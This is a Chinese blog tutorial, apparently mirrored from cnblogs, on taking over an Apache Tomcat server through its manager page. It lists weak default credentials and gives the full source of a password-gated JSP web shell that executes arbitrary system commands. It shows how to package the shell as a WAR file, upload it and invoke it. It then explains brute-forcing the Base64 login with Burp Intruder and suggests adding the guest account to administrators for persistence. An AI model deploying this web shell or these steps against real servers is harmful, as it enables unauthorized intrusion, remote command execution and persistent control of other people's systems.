zoukankan      html  css  js  c++  java
  • Tomcat管理弱口令页面Getshell

    目录

    弱口令Getshell

    利用Burpsuite对tomcat账号密码进行爆破


    弱口令Getshell

    Tomcat安装完成后会有如下页面,点击该页面的 Manager App 处会弹出输入用户名和密码的认证框。我们也可以直接访问:http://127.0.0.1:8080/manager/html   来访问该管理页面

    此时,需要我们输入用户名和密码进行登录。我们可以尝试一下该页面常见的几个弱口令:

    • 用户名:admin    tomcat    manager
    • 密码:admin    123456    tomcat    s3cret   manager   admin123

    该页面的认证账户和密码存在于 Tomcatconf omcat-users.xml ,如下

    如果我们成功登录,我们将进入管理网站的页面。在该页面的上传文件处,存在上传 .waf 文件的上传按钮。我们可以上传后缀为 .war 的木马文件。

    那么如何制作后缀为 .war 的木马文件呢? 我们这里制作的是jsp的小马,真实环境建议上传小马,因为大马会被拦截。关于更多的jsp木马。

    jar -cvf one.war jsppwdcmd.jsp      #one.war为生成后的文件,jsppwdcmd为木马文件
    
    *****************jsppwdcmd.jsp木马内容********************************
    <%
        if("123".equals(request.getParameter("pwd"))){
            java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int a = -1;          
            byte[] b = new byte[1024];          
            out.print("<pre>");          
            while((a=in.read(b))!=-1){
                out.println(new String(b));          
            }
            out.print("</pre>");
        } 
    %>
    

    然后我们可以将 one.war 上传到该页面,如下上传成功。

    我们点击该 one,进入了该one的目录下。

    我们查看服务器的one目录,我们的木马 jsppwdcmd.jsp 在one目录下

    于是,我们访问以下链接:http://127.0.0.1:8080/one/jsppwdcmd.jsp?pwd=123&cmd=ipconfig

    可以看到,成功获取权限。

    接下来,我们就可以执行cmd命令,对服务器进行操作了。传送门——> 提权辅助页面  、Windows基础之DOS命令

    注:在正规的渗透测试中,当我们获得了服务器的权限后,应该尽可能的不要对该服务器进行过多的操作,我们可以激活 guest用户,修改密码,将其加入管理员组内。但是最好不要新建用户。

    利用Burpsuite对tomcat账号密码进行爆破

    我们输入用户名:admin  密码:123456 尝试进行登录

    用burpsuite抓包,箭头所指就是我们输入的用户名和密码加密后的数据,我们发送到Decoder模块进行解密

    选择base64进行解密,如下,所以我们可以得到该加密数据的格式是:用户名:密码 进行base64加密后的数据

    知道了这个后,我们就可以利用burpsuite进行暴力破解了。将数据包发送到Intruder模块

    选中该数据为爆破点

    payloads这里type我们选择Custom iterator,第1个位置就填我们的用户名字典,第2个位置就填 : ,第3个位置就填密码字典

    然后在 Payload Processing这里我们选择 Base64-encode编码。

    payload encoding这里我们取消勾选URL编码

    点击Intruder开始爆破,对返回长度进行排序,可以看到爆破成功!

    对该payload进行base64解密即可得到正确用户名密码。

  • 相关阅读:
    资料网站
    HTML、CSS部分
    面试题三
    面试题二
    面试题一
    上学时的HTML+JS+CSS(小总结)
    01.策略模式-上篇
    【解决方案】HTTP could not register URL http://+:6001/
    【问题与思考】1+"1"=?
    WCF安全3-Transport与Message安全模式
  • 原文地址:https://www.cnblogs.com/csnd/p/11807673.html
Copyright © 2011-2022 走看看